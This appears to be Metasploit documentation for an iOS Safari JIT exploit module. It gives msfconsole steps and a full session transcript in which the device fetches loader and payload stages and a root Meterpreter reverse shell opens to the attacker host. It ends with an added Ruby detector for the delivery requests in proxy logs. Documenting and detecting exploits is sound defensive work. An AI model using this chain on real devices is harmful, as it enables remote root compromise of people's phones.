GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/apple_ios/browser/safari_jit.md

Vulnerable Application

This module exploits a JIT optimization bug in Safari's WebKit engine (JavaScriptCore). The bug lets the module write shellcode into the RWX memory region that JavaScriptCore maps for JIT-compiled code and then execute it. That shellcode carries a kernel exploit (CVE-2016-4669) which obtains kernel read/write, escalates the process to root and disables code signing. Finally, the module downloads and executes the Meterpreter payload on the device.

This module has been tested against iOS 7.1.2 on an iPhone 4.

Verification Steps

  1. Start msfconsole

  2. Do: use exploit/apple_ios/browser/safari_jit

  3. Do: set lhost [ip]

  4. Do: set srvhost [ip]

  5. Do: run

  6. On a vulnerable device, browse to the URL the module prints (SRVHOST on SRVPORT, 8080 by default)

  7. A Meterpreter session running as root should open.

Options

DEBUG_EXPLOIT

Show debug information during exploitation. When enabled, the exploit and the payload loader write entries related to exploitation and payload loading to the iPhone syslog, which helps troubleshooting but also leaves traces on the device. Defaults to false.

Scenarios

iPhone 4 with iOS 7.1.2

```
msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) >
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2 safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2 safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2 safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2 safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2 safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
```
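The request sequence in the transcript above (`/`, then `/loader.b64`, `/macho.b64` and finally `/payload`, the last one fetched by CFNetwork rather than by the Safari user agent) is a usable network indicator for this module. The Ruby script below is an added example written for this page, not code from the Metasploit module or its documentation. It assumes a web proxy or gateway that records the device's outbound requests in Apache/NGINX combined log format, that the module's resource names are the defaults shown in the scenario, and that all requests from one device share a client address; the log lines it scans are constructed for the example.

```ruby
# Added example, not part of the Metasploit module or its documentation.
# Assumptions: combined log format, the module's default resource names as
# shown in the scenario (/loader.b64, /macho.b64, /payload), and one client
# address per device. Sample log lines below are constructed, not real traffic.

# Delivery stages, in the order the scenario output shows them.
STAGES = %w[/loader.b64 /macho.b64 /payload].freeze

# Combined log format:
#   client ident user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"\z/

# User agents copied from the scenario transcript, plus an unrelated desktop one.
IOS_UA = 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 ' \
         '(KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53'
CFNET_UA = 'MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0'
MAC_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 ' \
         '(KHTML, like Gecko) Version/13.1.2 Safari/605.1.15'

# Build one constructed combined-log line (GET, status 200, 512 bytes, no referer).
def log_line(client, time, target, user_agent)
  %(#{client} - - [#{time}] "GET #{target} HTTP/1.1" 200 512 "-" "#{user_agent}")
end

# Constructed sample log: 2.2.2.2 completes the chain exactly as in the scenario,
# 3.3.3.3 stops after the loader, 4.4.4.4 is an unrelated desktop client.
SAMPLE_LOG = [
  log_line('2.2.2.2', '04/Aug/2020:12:08:22 -0400', '/', IOS_UA),
  log_line('2.2.2.2', '04/Aug/2020:12:08:22 -0400', '/loader.b64?cache=1596557302841', IOS_UA),
  log_line('2.2.2.2', '04/Aug/2020:12:08:23 -0400', '/macho.b64?cache=1596557303179', IOS_UA),
  log_line('2.2.2.2', '04/Aug/2020:12:08:26 -0400', '/payload', CFNET_UA),
  log_line('3.3.3.3', '04/Aug/2020:12:10:01 -0400', '/', IOS_UA),
  log_line('3.3.3.3', '04/Aug/2020:12:10:02 -0400', '/loader.b64?cache=1596557402000', IOS_UA),
  log_line('4.4.4.4', '04/Aug/2020:12:11:00 -0400', '/index.html', MAC_UA)
].join("\n")

# Parse one combined-log line into a hash, or return nil if it does not match.
def parse_log_line(line)
  m = LOG_RE.match(line.strip)
  return nil unless m

  { client: m[1], time: m[2], method: m[3], target: m[4],
    status: m[5].to_i, user_agent: m[6] }
end

# Extract the iOS version from a Safari-style user agent ("7_1_2" -> "7.1.2").
# Returns nil for agents that carry no version, such as the CFNetwork one.
def ios_version(user_agent)
  m = user_agent.match(/CPU (?:iPhone )?OS (\d+)_(\d+)(?:_(\d+))?/)
  return nil unless m

  [m[1], m[2], m[3] || '0'].join('.')
end

# Correlate stage requests per client address. A client that fetched all three
# stage resources is reported as a complete delivery chain; fewer is partial.
# The /payload fetch uses a different user agent, so correlation is by address.
def detect_safari_jit_chain(log_text)
  clients = Hash.new { |h, k| h[k] = { stages: [], ios: nil } }
  log_text.each_line do |line|
    rec = parse_log_line(line)
    next unless rec

    path = rec[:target].split('?', 2).first   # drop the cache-busting query
    next unless STAGES.include?(path)

    entry = clients[rec[:client]]
    entry[:stages] << path unless entry[:stages].include?(path)
    entry[:ios] ||= ios_version(rec[:user_agent])
  end
  clients.map do |client, entry|
    { client: client, ios: entry[:ios], stages: entry[:stages],
      complete: (STAGES - entry[:stages]).empty? }
  end
end

if __FILE__ == $PROGRAM_NAME
  detect_safari_jit_chain(SAMPLE_LOG).each do |f|
    state = f[:complete] ? 'complete delivery chain' : "partial (#{f[:stages].join(', ')})"
    puts "#{f[:client]} iOS #{f[:ios] || '?'}: #{state}"
  end
end
```

Treat a hit as a lead rather than proof: user agents are trivially spoofed, a NAT gateway makes several devices look like one client so a "complete" chain could be stitched from two devices, and an operator can rename the served resources. The iOS version is still worth recording, because the module is only documented against iOS 7.1.2 and a reported version on a patched device suggests the exploit failed rather than succeeded.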